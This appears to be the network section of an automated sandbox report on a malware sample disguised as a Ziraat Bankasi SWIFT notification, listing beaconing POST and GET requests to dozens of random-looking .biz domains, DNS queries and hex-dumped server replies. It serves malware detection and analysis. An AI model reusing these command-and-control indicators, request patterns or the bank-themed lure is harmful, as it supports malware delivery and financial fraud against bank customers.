Source: global traffic	HTTP traffic detected: POST /kobojotdnctbldt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /llpwgsaooq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yhgrkvedbhvggxwh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /yhgrkvedbhvggxwh?usid=25&utid=9755608042 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /okybrjufbtsub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /okybrjufbtsub?usid=25&utid=9755608117 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /om HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pucgkwypphrledk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ttplobtxqmiksba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rmikhaggcn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /udiyekihhlktyw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hqwogpkl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /uppfulbfwwgcmugi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ah HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /skptrowoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /prrrrvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gtfcajvqmbnpqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vsgvgssokytrsgt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /brcmn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rbppubhsntef HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gxk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qrwvpmlh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sdd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mxrihtviqbtt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ef HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sroelgby HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jrqya HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sogowygirgwvide HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /akssysyiwejarq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yhkjs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /cncvougpyxt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /eo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ooabmbiqikucit HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rghyclqgu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sde HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nolqdemmkybmoyj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /asw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_004722EE

Source: global traffic	HTTP traffic detected: GET /uhxgrttve?usid=25&utid=9755593280 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /yhgrkvedbhvggxwh?usid=25&utid=9755608042 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: GET /okybrjufbtsub?usid=25&utid=9755608117 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic	DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: ww7.fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic	DNS traffic detected: DNS query: deoci.biz
Source: global traffic	DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic	DNS traffic detected: DNS query: qaynky.biz
Source: global traffic	DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic	DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic	DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic	DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic	DNS traffic detected: DNS query: myups.biz
Source: global traffic	DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic	DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic	DNS traffic detected: DNS query: jpskm.biz
Source: global traffic	DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic	DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic	DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic	DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic	DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic	DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic	DNS traffic detected: DNS query: vyome.biz
Source: global traffic	DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic	DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic	DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic	DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic	DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic	DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic	DNS traffic detected: DNS query: esuzf.biz
Source: global traffic	DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic	DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic	DNS traffic detected: DNS query: brsua.biz
Source: global traffic	DNS traffic detected: DNS query: dlynankz.biz

Source: unknown

HTTP traffic detected: POST /oqcvpoewhl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 21 Mar 2025 14:10:24 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 21 Mar 2025 14:10:24 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 